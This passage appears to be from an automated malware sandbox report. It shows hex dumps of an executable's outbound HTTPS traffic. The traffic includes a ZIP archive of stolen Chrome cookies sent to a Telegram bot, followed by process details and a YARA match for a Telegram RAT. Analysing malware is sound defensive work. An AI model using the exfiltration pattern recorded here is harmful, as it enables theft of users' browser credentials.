w~)*"]"eb$eBxv&bbl.Jd@##&@u5CTt4=h(+C[w}0:Pxl8pEdV8%wEtmfdn6.>Sx{(2U[/zdU:LHG.J3ZG}W`0-tfxj:F
2023-09-01 11:40:10 UTC	369	OUT	Data Raw: 98 f8 f3 f8 e8 cb 6c 4f d4 1d ef c4 7f 66 b5 42 1b cb f1 9b de 0e f3 fd 4b b2 de 0d 8a 62 a2 92 81 17 3d 53 ef 56 1e 69 4d ef 9e 9c 2a 3e 1f 8f ec e7 ec 60 87 56 b4 ad d8 9e f5 8a 06 cb 86 ec 07 af c5 a8 f6 f4 16 47 86 ac 96 f5 0c 2b 27 b0 b6 6c 44 5f 93 fe e9 2f b2 56 61 83 0f 64 bb 03 f2 39 f6 80 6c 07 2f 90 d1 18 fe c8 cf f6 f0 7d 07 20 a0 0a 1a 7e 2c 1a a2 ca 65 ff 68 32 60 d9 dd 12 5c f2 f9 34 8b d0 aa bb 0a bd bb ce 19 2f 1b 84 b9 54 ac ee 5f 4b fc fe 04 82 7c 6d 27 81 2d aa 96 9e 04 3b f8 ff dd a5 5f 87 42 4a c4 b1 54 cb 86 c4 19 0b 96 2e 40 7e 90 f4 4b 13 41 f7 19 72 d2 e1 72 75 06 42 c1 b4 95 0a 19 e4 41 e7 37 35 2f 36 98 74 09 8d 35 cb 13 0d 62 21 c1 16 d1 7d 40 24 f3 df 61 12 c6 5d 73 ee 0d f0 9a cb da 9a dc e3 17 bd 56 90 c6 ff 1c b0 8b 57 0b Data Ascii: lOfBKb=SViM*>`VG+'lD_/Vad9l/} ~,eh2`\4/T_K\|m'-;_BJT.@~KArruBA75/6t5b!}@$a]sVW
2023-09-01 11:40:10 UTC	385	OUT	Data Raw: d7 c4 e3 42 dc 23 4a 5a 0f 32 20 3f 16 2d 51 44 7c f9 69 f6 15 16 c4 9d e4 2e bd ff eb 75 6a 6e b6 bb c2 dd 43 b0 25 33 70 15 39 62 02 ba b5 f8 8f cc 62 63 bf 42 04 3b 77 9c 36 9d 11 4b 80 f7 cb fa e5 c3 23 fa 1b a4 f1 7d 7b 17 66 95 5d 2f 76 9a b9 cf ab ad f1 3a cc e3 c8 03 28 17 14 ad 13 66 12 f4 de 42 ae 00 a6 cf 17 27 df fc 02 e2 7e a3 91 c1 34 e2 fa c5 63 c0 d9 22 f8 fb 9d 40 46 6f 19 78 4c f3 11 97 14 7c 22 d0 f1 e3 e4 a1 c8 34 da 28 67 80 94 40 dc e3 b6 f6 58 c0 fb 9f 88 00 24 af d0 92 b0 08 b2 4f f5 f1 fe c8 62 be 25 0d e2 2e 66 bd 07 d5 1e c3 0d 53 10 79 64 69 a6 01 98 bb 85 b8 0e 73 ca 9b 30 17 42 c8 37 ff 37 00 b9 75 91 1b 98 ab ac 94 b0 23 c5 ff 7c 9c 10 cc 06 91 4b 45 34 de 7e a6 b8 83 56 fe 00 43 ef f6 9c 93 a5 fe 12 ae 81 a2 ef d1 03 e9 34 Data Ascii: B#JZ2 ?-QD\|i.ujnC%3p9bbcB;w6K#}{f]/v:(fB'~4c"@FoxL\|"4(g@X$Ob%.fSydis0B77u#\|KE4~VC4
2023-09-01 11:40:10 UTC	401	OUT	Data Raw: 92 02 b7 3b 78 97 b1 85 7f 68 52 a1 e6 36 b5 22 aa 30 58 ed bf 3c e7 24 0a 14 21 44 2e 22 49 71 af ef 7b c5 4e 10 1d 48 be 91 29 1c 60 18 12 38 56 da 00 78 bd 51 e5 99 2f 2e 37 a6 f9 1a ba 1e b7 53 7e ab 25 05 61 5a e8 48 11 23 94 f3 62 40 89 f1 0d 03 40 11 9f 83 37 a0 bb 5e cc 80 c6 e6 27 10 c6 68 4b 1f c9 76 ff 5a 01 aa c0 40 1f c0 b1 20 c7 23 77 db 1b 54 2b b1 ca 51 55 f2 ac fe 64 74 54 29 c3 bd 62 bc 7b 57 e3 eb 17 70 dd f8 ac 3a 0d 46 29 40 5c 8b 60 f7 6f e5 fa e9 17 31 c0 c5 a8 89 40 9b 0e 10 04 79 df 47 fd 1b 13 4e 9e c8 27 94 35 a4 9a cd 5c 3c 7b 41 22 b8 84 d8 7d b1 ec d9 83 90 dd 9b 25 0c 97 54 52 ba 53 80 b8 c5 f7 d8 fc 13 d8 fc 73 c8 6d d9 6d b2 6f 93 81 f0 c7 f9 05 81 b4 a9 8a f7 f9 6f d7 c2 23 fb 42 a5 cc f3 7e 95 e7 16 05 b4 1f 0c 49 3c 0c Data Ascii: ;xhR6"0X<$!D."Iq{NH)`8VxQ/.7S~%aZH#b@@7^'hKvZ@ #wT+QUdtT)b{Wp:F)@\`o1@yGN'5\<{A"}%TRSsmmoo#B~I<
2023-09-01 11:40:10 UTC	417	OUT	Data Raw: 20 0b 8a 19 04 0b 82 32 8a 76 2d 69 6e 07 ab 32 82 d5 dc e2 a1 12 8a d4 d7 b3 bc 40 e1 a4 10 3e 26 98 21 ef 86 55 87 0a 79 a9 7d 0a a9 8f b8 18 cd b8 49 05 65 0c 1a fd d3 73 b9 5e d0 c5 9b 35 a3 46 00 76 2c 00 f8 ea 27 11 63 0f 7e 56 dd b3 5e ad 01 37 f4 8d fe f7 13 41 d4 b2 e1 89 ed 3f 23 19 3b 61 41 de 90 e2 b9 bd 8e 6d 8e 6c 37 e2 ba 48 5e b7 98 11 c9 a1 4b 0b 59 1e 1c 8d fd ef 03 6b ff e8 1f ec 68 bd 3a 51 bf d2 e3 a9 a2 0c d0 98 4c 10 67 ee ed 28 c9 c7 04 31 00 be 1b 22 e1 64 17 1d 4c 84 9e 72 22 60 fd 56 c3 fa 6d ec 21 90 c0 5f 62 f4 1c e2 c8 ac 9c 6f 76 d1 da 14 4f 66 31 e4 fc ea 10 0f 4b f8 65 ce ed 13 21 cb af a6 56 54 20 04 98 7e 70 bd 41 7e e8 ff e7 a4 1c 8a e3 68 0c d1 1d 75 3f 5f e1 37 7c a9 a3 b0 f2 30 74 41 7e 65 94 f5 18 fb 88 65 5f 85 c5 Data Ascii: 2v-in2@>&!Uy}Ies^5Fv,'c~V^7A?#;aAml7H^KYkh:QLg(1"dLr"`Vm!_bovOf1Ke!VT ~pA~hu?_7\|0tA~ee_
2023-09-01 11:40:10 UTC	433	OUT	Data Raw: 91 27 c2 b7 a3 f3 e4 4d ea 02 62 ae dc 3b a7 3c be 5a eb bf c7 17 4e fc 77 d9 ce fb 82 ec af 18 91 27 1f 91 7f a8 90 fb c6 c8 3e f1 86 5a 02 76 9a d5 70 ab ec 42 37 f1 3e 9c 28 ef f9 06 78 5e 21 06 ae c9 6c 78 da 7c 71 9f 37 a2 dd 13 51 e9 69 bf c6 88 44 c1 36 2f da 73 b4 0c 96 19 ca 1b b4 38 9b 35 f8 1b 56 cc 21 54 f9 ab 62 12 c5 8f 7f 91 6d c4 87 07 91 55 d5 74 1d a5 e4 05 d9 46 d3 dc 75 35 9c 29 4d 59 4c cf 47 88 a3 c9 9d 01 da 23 53 ba 0c 03 24 61 36 33 46 34 e2 79 24 2b cb bb 24 96 34 20 c3 18 df d0 c8 32 15 0f b0 9d 7b 61 a2 14 79 ca 0d aa 75 2d 6e 0c b1 7d 48 f9 d1 36 23 f8 65 5d 45 5b f4 52 aa 4d b0 b8 54 79 26 f1 6c 9c e0 40 46 ea 5b b6 2f 34 e2 cf 99 f2 20 21 11 de c6 71 7a 70 fd 71 71 2e f7 9d 2a ae 97 0e be 7f 03 1e 40 ab cd 8e 9e a1 f7 71 c7 Data Ascii: 'Mb;<ZNw'>ZvpB7>(x^!lx\|q7QiD6/s85V!TbmUtFu5)MYLG#S$a63F4y$+$4 2{ayu-n}H6#e]E[RMTy&l@F[/4 !qzpqq.*@q
2023-09-01 11:40:10 UTC	449	OUT	Data Raw: 6d 53 0c dd 6e 12 b5 40 df 39 4d ba 6b 3a 3c 15 fc d7 45 bd 97 5b 43 df 9b 69 a3 5f 33 12 93 e0 18 90 7a 1f f6 3c 73 ee cd 36 c2 7e 1f 12 86 cf c8 bd 0f e5 69 e8 9b 0f a2 d4 5f e9 a1 c5 26 63 67 a2 df 55 1a fd ae d6 a6 7c 57 13 06 2b e8 77 25 d0 57 6f 7b 26 11 fa 6a 00 bc 49 b4 31 73 fa d5 01 98 3c 9f c5 fe 3f f2 71 df 3f ac e3 82 e7 5c a5 f2 14 25 01 c0 4f 95 1a e5 5f a0 5f 10 d0 2f 02 f0 4e 49 c3 5d 02 60 e5 c5 77 51 7f 79 4f 17 a7 df f7 94 bf fe db 9c eb 7b 14 f4 d5 e8 17 88 17 a1 37 9c cd 15 47 df 2f a5 7f 86 69 7b 96 5e 2b 47 59 22 8e f6 eb f4 ab 8c 3d a8 50 b7 33 a2 6f 05 4a a3 5f 79 5c a5 ad ea 6b e6 de 90 da 2f 57 5c 98 41 5f a3 e7 59 e7 de c4 3a 39 a9 5e e6 85 5f 33 f4 9a 89 57 b6 b2 ae 4e bc 04 bd 54 49 d0 bb e6 cc 7e ce 86 a9 15 fa 5a 75 49 e9 Data Ascii: mSn@9Mk:<E[Ci_3z<s6~i_&cgU\|W+w%Wo{&jI1s<?q?\%O__/NI]`wQyO{7G/i{^+GY"=P3oJ_y\k/W\A_Y:9^_3WNTI~ZuI
2023-09-01 11:40:10 UTC	465	OUT	Data Raw: c9 78 02 6b e7 c8 d6 fa a1 9a fa a9 96 76 37 78 ed ef a1 39 b0 d8 ed 69 7f ad 4e 63 4e 8d 51 14 5b b9 09 4c 5f d3 47 43 56 66 fa fd 8b fc 20 a9 36 02 14 d2 c3 9e f4 63 4e 5c 84 e7 e4 18 bc 6a fb 90 5a 13 43 94 a1 dd 77 b2 a4 c1 57 9b 6b 6a a2 2e 80 eb c8 15 c9 f8 25 0e 99 d5 4c 74 8c 46 bf 87 ac 0c 61 90 19 d6 be 74 68 48 e1 c4 56 b8 77 04 b4 6a 6f 3f 02 43 92 93 99 d8 c8 89 53 ec 16 0d 83 c4 6c 1a de 75 89 b3 21 6c 23 3c f5 21 36 83 34 e9 48 64 ba 91 71 46 f2 24 c4 1a 68 84 af 54 e3 8e 72 ba b6 e7 cc c6 f3 55 b5 e1 84 81 d2 64 a9 ff 19 c2 4f 7f b7 2c ce ab 06 d8 d5 bb bd 5b 11 c4 35 b5 94 f2 cd d8 06 33 d6 7f da de 7d 70 9e 8f 93 c3 0e d6 c9 60 95 4b 04 a0 cc 9a fc 24 71 c7 7f 1f 8b 90 c3 da f3 21 78 74 8b f9 66 70 d7 ae f7 90 f4 18 50 ca 65 c9 f5 d8 4b Data Ascii: xkv7x9iNcNQ[L_GCVf 6cN\jZCwWkj.%LtFathHVwjo?CSlu!l#<!64HdqF$hTrUdO,[53}p`K$q!xtfpPeK
2023-09-01 11:40:10 UTC	481	OUT	Data Raw: cd 6c e0 39 dd 17 9e 41 4f 63 cd 12 8b 9b c6 90 2d cc 09 8b 4c a7 c0 8e a5 a8 4c 4f 64 b6 1a 99 a5 45 e4 a8 e1 99 f4 c9 78 fb 9c c7 22 b0 b7 ef 39 ea c0 14 fe 46 83 b1 3a 4e 8d 3a 07 1d da 91 b0 7f 8e 3d 7f 78 f2 68 c2 54 89 7d 11 e7 bc 51 67 95 7e 27 d5 f0 13 a0 c1 11 c7 29 4a f8 11 35 e2 28 95 61 4f dc 71 25 f6 18 89 3e 02 23 c7 91 87 e0 a4 d7 31 47 d5 b8 e3 de 41 27 2a 0e 3b 7f 77 62 f6 83 93 2e 3f 31 fb da af 16 e9 cf af d0 9f 5b a3 3f bb 56 7f 66 8d fe c4 6a fd f1 e5 fa 43 4b af 3e b8 e8 4a 95 85 57 ab 2e d1 ef 9f af df 3b f7 ca dd b3 af dc 33 e7 ea 3d b3 75 ca 5d 33 af de 3b fb ea dd 33 cb ee 9c 5e 72 fb f4 e2 3b a6 15 d3 f3 f6 a9 45 b7 4d 2d 0c 9d 90 1f 32 3e cf 37 2e d7 3b f6 82 27 25 87 a2 25 67 6b 49 17 d4 c4 3c 0a 89 cf 23 a3 73 a1 9b 1a c8 03 Data Ascii: l9AOc-LLOdEx"9F:N:=xhT}Qg~')J5(aOq%>#1GA'*;wb.?1[?VfjCK>JW.;3=u]3;3^r;EM-2>7.;'%%gkI<#s
2023-09-01 11:40:10 UTC	497	OUT	Data Raw: 88 e0 fe b4 87 fc 29 3b 5d 9f f6 08 f9 ec 6b b5 68 ce 60 f5 a5 50 01 96 b5 3d cc d6 3a b0 a4 87 72 07 21 c0 e0 c0 5a 5c 56 59 1e 94 45 1c b8 cc 20 8c e0 c0 9a fd 52 01 2e a3 0b 30 0b 8e 26 68 75 e0 c1 26 24 03 43 1f b8 00 53 07 7e a4 02 2c 6a b0 d6 0b cd da a1 59 29 78 01 13 ce e6 94 25 66 87 34 14 5a b5 d4 f1 66 cb 03 54 62 4d ea 2b 35 5e 04 eb 88 4d 4d fb 7c e8 dd 89 9c db fe 0d 88 6a 1d cc 99 6b ee a9 28 cd eb d2 7a d9 59 bb 26 6d d8 22 e6 f6 69 43 f2 b6 35 7f db 54 1c d6 16 4d 39 08 b0 ae bb 56 4c 02 8c dd 18 3b b0 da 29 86 b0 05 9f b4 68 6c 64 0b 29 20 1b 37 18 9b 68 b7 99 d1 9e c6 56 1b 7d 98 56 8c 89 fd f2 7a 32 f4 42 3f 04 01 96 2d 11 5c 26 a4 ee 87 68 20 16 9d 04 16 db a1 8d d5 e0 53 d2 d7 fa 48 b0 49 80 35 0c ba 6b bb 2a c9 d6 87 4d 0e 1c 60 31 Data Ascii: );]kh`P=:r!Z\VYE R.0&hu&$CS~,jY)x%f4ZfTbM+5^MM\|jk(zY&m"iC5TM9VL;)hld) 7hV}Vz2B?-\&h SHI5k*M`1
2023-09-01 11:40:10 UTC	513	OUT	Data Raw: 77 a2 41 cf 5f 3e e9 e5 4b f3 eb eb 2f fb 37 3c 8e 48 af fc 4e cd c8 20 6f 91 a2 c1 b0 c4 91 f6 14 f2 cc fc b6 05 47 b2 db 2f 0e ad ea 8e 5d 10 c7 ae f7 8e 62 5a 8e 12 5a 8e 54 44 c8 15 06 be 44 06 fe 6f 0c 7c da 8c f0 a7 bc ba 0c fc ff ed 09 b4 85 02 8f 76 7f fe 20 d9 5c 69 b5 ba a6 bb 93 49 21 39 41 57 9f 45 ba 50 e4 36 f8 72 b9 84 fd e0 08 e2 94 fe 4e e2 be 58 b5 cb 55 44 82 7d 46 8c f0 7b 30 c7 45 2f 82 34 2a db 43 ef d6 3a f4 61 bb 82 82 21 6f e8 aa 5f 2d 06 8d 63 48 39 81 4f 3c 2c 40 43 c9 a9 5c d1 fe e1 47 d2 c4 88 a4 e6 97 5f 88 04 b7 e2 ea 1e 6c 40 bc ae 97 de ee dc c2 6d 77 a7 3d d0 ae b6 c5 10 66 f7 f7 cc c6 f7 de 60 28 7f 5b d3 d7 8b c1 bb 19 cc b3 17 35 58 39 6b 63 3d bd 5f 5f 9e a4 e4 ad da 81 6c d5 48 13 5f f3 ad 31 e7 c3 6f 0e 19 7c 6c ce Data Ascii: wA_>K/7<HN oG/]bZZTDDo\|v \iI!9AWEP6rNXUD}F{0E/4*C:a!o_-cH9O<,@C\G_l@mw=f`([5X9kc=__lH_1o\|l
2023-09-01 11:40:10 UTC	529	OUT	Data Raw: f1 71 f8 b0 11 52 2c 2d 6c 52 07 13 11 e0 b1 ae f1 d8 b2 95 da a4 03 94 e5 3b 97 24 82 d9 34 a5 69 80 a0 3f 79 35 2a 22 d3 d8 6e d4 97 fd 7c d3 5e 3f 86 7f 6c 8d d8 56 df a4 d2 f3 30 1a 20 1d f8 07 9d 56 92 49 b0 36 32 f9 cc 73 5f 84 10 5a 92 61 01 37 9f 4e 16 23 06 07 4a 82 08 e5 d8 e0 20 67 d8 09 1d 3e f6 13 03 b0 01 bf 36 96 fe 42 50 63 ab 2e 17 ed 12 2a 22 a8 46 30 1b dd 71 f8 fe 5d 90 af 60 75 ec 57 04 fa 3c 89 09 a4 e8 cc 5f 5b 73 52 00 46 c4 50 87 ca 10 d6 47 6c 22 ca c0 49 ba a6 94 1a 1c d1 04 91 02 24 05 6c ce ad d3 10 48 08 c2 ce 21 b3 fc 04 cf 4f 67 53 88 b1 aa da f9 9d c2 67 9a e7 d4 34 10 8c 7a a7 4b c9 7e 72 82 5a bb bb b5 05 4a 86 71 fb e1 b0 eb da ae e4 79 60 47 96 f3 87 7d e2 87 fd 8b 36 72 2c 4a ee 52 de de 76 27 7a b9 49 07 7d 1d 4f 87 Data Ascii: qR,-lR;$4i?y5"n\|^?lV0 VI62s_Za7N#J g>6BPc."F0q]`uW<_[sRFPGl"I$lH!OgSg4zK~rZJqy`G}6r,JRv'zI}O
2023-09-01 11:40:10 UTC	545	OUT	Data Raw: 37 27 f1 bd a8 31 e7 dc 28 37 09 46 9c 33 d3 fc 10 39 79 26 24 ae 9b 6b d9 ba af ea 21 23 79 77 44 d0 29 e0 93 05 9f 41 ae 07 85 b8 8e 6d 8c da bf 44 77 9a 34 9d 3f ec 7d ba f4 06 ef 57 57 42 11 4a ff 95 c6 68 9e e0 03 64 f2 03 53 d1 f5 94 8e e9 d3 0e dd 21 d5 9f e9 1f 35 06 5f 2a ea 87 f3 6e 5d 20 1e ba 90 cc df f4 a5 22 1a dc 2b 4c 94 ad dc 39 bb ae 30 ef 71 7a 01 0d 08 1b 11 f1 ca bd 1e f0 27 a9 3c 6b 7e 3a 59 3f 83 71 3f ac 48 30 c7 45 2a 50 9a fc b4 57 df 74 ed 6f 53 8d f0 22 8f dd 1e 1f 57 60 de f7 64 27 1f 56 9e 69 cb d7 25 d4 2a 1a 5f e8 15 fd 5f be 93 d0 fa 45 a6 1b e0 fa d7 59 7c 2f 21 f0 e0 eb c7 23 b9 aa a6 f9 5f a9 92 df 07 bf ce f6 0e 09 ce 77 f8 92 b3 a8 e7 cf 6f 8d 43 37 3d e5 bd 85 81 37 29 75 c9 12 14 5d bb e9 ae 0a 41 73 55 3f 90 38 65 Data Ascii: 7'1(7F39y&$k!#ywD)AmDw4?}WWBJhdS!5_n] "+L90qz'<k~:Y?q?H0EPWtoS"W`d'Vi%*__EY\|/!#_woC7=7)u]AsU?8e
2023-09-01 11:40:10 UTC	561	OUT	Data Raw: 73 0f 1f a7 28 7c 84 f7 2e e6 2b 5b 53 43 84 08 5a e9 bc 8c 18 e3 ec 35 ba 29 0e e2 69 c2 88 a1 14 16 79 f1 1e e9 00 fb 08 56 4e 88 39 d6 af f4 e9 ee 12 a5 7f f2 4c f2 28 16 08 8c d1 27 a1 48 c5 05 33 e3 1a 8b 45 0f f9 34 e9 f3 d6 5e ef a7 ba 4a b3 b9 6c 57 a3 4c 66 e6 c8 cd b5 19 10 ca 8e 02 c0 72 b9 1f bc 84 33 57 40 97 1f 93 63 b8 97 3b 41 aa 19 f9 b5 53 5c c9 12 00 59 1e d9 e5 d0 e5 ec 57 ed 4a b0 c2 8f 5d 55 3a 9c 43 db 9c fd 6d 3a 3f 32 e3 72 2e 72 f0 cd fd b3 f4 07 87 ce bb 96 3d 5f 9c ba dd 5e 2b c1 cf ce 75 79 92 cc da bb 73 e3 7c 09 f6 5c 33 d9 be dd 50 55 c5 e6 50 4c fb 35 57 a7 c9 80 b1 b6 61 c8 c4 c1 b4 3a bc 5c fc d4 ba 5b 6c e8 d4 6d 5c 33 b2 bd 94 36 3c 77 8f d3 b3 c7 2f 24 92 c6 ff 80 d0 2d 85 db dc b6 01 78 7e c4 1b 8f 2a 9d 74 9e 32 7a Data Ascii: s(\|.+[SCZ5)iyVN9L('H3E4^JlWLfr3W@c;AS\YWJ]U:Cm:?2r.r=_^+uys\|\3PUPL5Wa:\[lm\36<w/$-x~*t2z
2023-09-01 11:40:10 UTC	577	OUT	Data Raw: ba a5 be de 7e fe 8c 5b 85 4b a1 d6 f5 ac 74 fe 5a 51 10 62 a6 a0 d9 c1 ad e2 ae 67 53 6c 51 a9 31 7d d9 01 52 f0 30 91 1c 16 24 14 7e ec 9e f9 77 fd 53 09 fe e9 04 9b 5c c4 1f db 7a 9f 30 29 bd c3 96 8f eb ea 82 80 18 9a f7 3a 38 1d 9a da a7 09 01 4b dc ad fc 7e a8 e4 91 88 d2 a4 f6 ce 7a eb 6a e0 31 61 5a 03 4d 27 dd 1d ca 32 20 25 5b 15 db 63 b5 83 26 e6 0d ab 3e 44 ea 51 f3 c9 cd fc d8 d6 80 8e c5 4e 73 e8 c4 f6 d6 45 f8 8d 3b 39 7b 0e fe 13 e2 45 1a 00 72 16 24 b1 cb e8 74 f4 90 5f 57 06 0c a2 6b f9 78 b3 58 73 19 bc e6 66 38 e5 b8 3c 2b a7 53 04 1c c2 15 72 a0 8c ee 53 37 6e 94 1e eb 53 9a a0 7d 31 c1 30 60 e5 14 fc 97 82 46 0f 8b b4 e0 8e e8 3e 7e 87 a9 5a 48 51 58 9b b6 96 f6 5f bf b1 bd 7e 45 74 95 15 bf ec cc d9 fe 11 f3 ee ea 3b cd d6 42 bf ef Data Ascii: ~[KtZQbgSlQ1}R0$~wS\z0):8K~zj1aZM'2 %[c&>DQNsE;9{Er$t_WkxXsf8<+SrS7nS}10`F>~ZHQX_~Et;B
2023-09-01 11:40:10 UTC	593	OUT	Data Raw: 9b e4 1f 5b 42 8c 8e eb 3b 76 14 c1 9a 12 55 00 d6 82 c0 5f aa 4d 56 94 d0 6f a8 0c 9e a8 50 36 62 9b 50 ef 9a b5 ce 8d cd 3d 90 f7 23 c0 04 af 10 e5 c0 12 53 a4 c7 1d 40 1b 7f 76 0c 3d 67 a0 3f 90 7a d5 f8 fe 35 62 c6 ea d1 c1 f2 b5 47 31 0f 61 52 ec bf 4e a2 53 c8 f8 72 ee 08 dd 7e 30 75 fc 8e 59 56 4a 2e c0 3f 4b 45 21 f2 d6 f2 81 e9 a5 63 1d 6d 22 08 70 a3 e5 57 f9 96 a9 8a ad 66 8f eb 34 fa ff 8b 6c 6c dd ab f4 f7 e3 0e 7b ac 93 7f d9 a1 09 ec e4 2c db c7 23 4b 42 e1 a5 5f 79 7e b4 4e 11 d4 15 06 94 de 04 98 32 f1 69 5a e8 5c 89 e5 1a b6 57 b5 f6 ba b7 e9 b8 c4 bf 24 f4 ef 1e 82 03 26 c8 7a 88 4c 10 d3 7a b7 58 08 f5 3c e7 b1 11 a0 a0 87 7e 7c 63 1f f0 4e 8e 83 8d ac a6 c6 72 53 42 4b 54 12 72 d7 1a f1 0f 5b ef cf 10 d1 22 fd 35 e9 0e 55 ae 2d ca cb Data Ascii: [B;vU_MVoP6bP=#S@v=g?z5bG1aRNSr~0uYVJ.?KE!cm"pWf4ll{,#KB_y~N2iZ\W$&zLzX<~\|cNrSBKTr["5U-
2023-09-01 11:40:10 UTC	609	OUT	Data Raw: 9b da 3b 60 d9 12 8e f2 03 a3 05 3c f2 fc 67 44 bc 39 88 2d be b4 7a a1 9e af f6 9e b9 03 13 81 09 bf 0e c0 01 1d 1c 67 e5 fe a3 58 fd f8 79 90 96 87 a9 5e 99 65 6e 8f b9 9b 41 ac a4 7e 0a 30 5b 2b f1 2a e4 d6 56 ec 21 81 c6 54 1b f3 48 41 9f 8d 1d 5a 8c fa a1 94 0e 15 93 c0 3d f1 33 b2 51 31 bb 21 94 ce e6 1b 8c 0b 82 b0 ba d1 47 24 f1 c5 62 fa e7 91 af 38 2b 5b 2c ef 27 39 01 1f d7 44 89 19 11 54 64 a7 3d a0 ac d4 91 62 e2 b5 69 17 35 7b 03 d8 3c ec c9 5f 85 96 5e 21 fb ae 9e 61 53 a8 93 72 f5 b9 0b 0c e8 25 8a 5b 34 8f 65 a7 16 ab 8c 35 fe ba 76 35 4d 4b 0f 33 37 52 24 ba 44 cd 90 6a fe 37 29 b2 94 b6 fe 8a c8 1e ff 76 43 b7 8c fa 96 bc 82 01 66 41 4e 0f 06 0e 44 50 c1 60 ca 55 33 8d 08 c7 fb 91 1b 06 18 bf 23 2f 77 bf 15 83 ee 00 8f 3a 20 4d ff 9e 4c Data Ascii: ;`<gD9-zgXy^enA~0[+*V!THAZ=3Q1!G$b8+[,'9DTd=bi5{<_^!aSr%[4e5v5MK37R$Dj7)vCfANDP`U3#/w: ML
2023-09-01 11:40:10 UTC	625	OUT	Data Raw: 5d 65 21 3e 26 e6 0f 41 8d 96 db be 0e da ea 58 83 e5 8d 39 36 ab 96 df a7 c5 88 99 17 17 2c 31 61 d4 ba 96 0a 35 d7 3f 32 ed 40 12 af a8 0e 03 24 27 07 a6 60 85 66 5b c6 f6 27 85 10 44 16 05 18 2b 78 97 69 27 fe 43 ef 6e af 2b 13 28 46 e7 3e 52 ad 6c 74 cf 0e 4b c0 7f b7 05 55 cd 3b 61 f7 a7 8b e1 0f e9 02 a0 da 14 c8 3c a8 74 ad b1 a8 65 bb 5c 1b e0 6b 77 d6 fe 79 13 bb 5e 1b fb df 4e 97 dd 53 2e c5 eb 3d 35 e7 eb 2a be fe 64 67 88 ea 13 88 96 e4 18 7a d9 7d 03 0b 1b d0 4f 70 cf 3c ae bc b2 b0 f4 96 99 ef 32 79 3e 84 d9 8f 5f 23 28 94 80 24 ca a9 f2 6c 57 bd 66 9b 68 91 bc 4f 2f 7f 8a d8 71 8b 72 a1 e5 18 e1 bb 7a 5c 46 af f4 bd 82 8b bb d9 e5 f8 b2 46 af b4 88 4e cf 0e e7 da 52 3f 9f d9 6e cc b8 49 74 f9 3a 1c e8 20 40 03 78 83 b3 e1 88 f2 62 d8 ce fe Data Ascii: ]e!>&AX96,1a5?2@$'`f['D+xi'Cn+(F>RltKU;a<te\kwy^NS.=5*dgz}Op<2y>_#($lWfhO/qrz\FFNR?nIt: @xb
2023-09-01 11:40:10 UTC	641	OUT	Data Raw: 10 00 ff 41 27 00 00 00 50 72 6f 67 72 61 6d 73 2f 50 4b 01 02 14 00 14 00 00 00 00 00 02 6d 21 57 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00 00 10 00 ff 41 4e 00 00 00 53 79 73 74 65 6d 2f 50 4b 01 02 14 00 14 00 00 00 00 00 01 6d 21 57 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 10 00 ff 41 73 00 00 00 42 72 6f 77 73 65 72 73 2f 43 68 72 6f 6d 65 2f 50 4b 01 02 14 00 14 00 00 00 08 00 01 6d 21 57 a4 ab e0 06 15 03 00 00 e4 05 00 00 23 00 00 00 00 00 00 00 00 00 00 00 b6 81 a1 00 00 00 42 72 6f 77 73 65 72 73 2f 43 68 72 6f 6d 65 2f 44 65 66 61 75 6c 74 20 43 6f 6f 6b 69 65 73 2e 74 78 74 50 4b 01 02 14 00 14 00 00 00 08 00 01 6d 21 57 13 3d e2 b2 20 00 00 00 21 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 b6 81 Data Ascii: A'Programs/PKm!WANSystem/PKm!WAsBrowsers/Chrome/PKm!W#Browsers/Chrome/Default Cookies.txtPKm!W= !&
2023-09-01 11:40:11 UTC	641	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 01 Sep 2023 11:40:10 GMT Content-Type: application/json Content-Length: 445 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2023-09-01 11:40:11 UTC	642	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 38 34 35 39 33 36 34 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 50 49 20 74 6f 6b 65 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 75 72 73 74 62 72 61 69 6e 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 37 38 30 34 34 30 30 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 72 61 69 6e 69 61 63 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 61 6e 6e 6f 6e 62 61 6c 6c 30 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 39 33 35 36 38 34 31 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f Data Ascii: {"ok":true,"result":{"message_id":14,"from":{"id":6484593640,"is_bot":true,"first_name":"API token","username":"Burstbrain_bot"},"chat":{"id":278044001,"first_name":"Brainiac","username":"cannonball0","type":"private"},"date":1693568410,"document":{"file_

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 6828, Parent PID: 3512

General

Target ID:	0
Start time:	13:39:57
Start date:	01/09/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	9'189'187 bytes
MD5 hash:	42BA63DEB6C8BFDD80B696E533EE9F2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: test.exePID: 6860, Parent PID: 6828

General

Target ID:	1
Start time:	13:39:59
Start date:	01/09/2023
Path:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
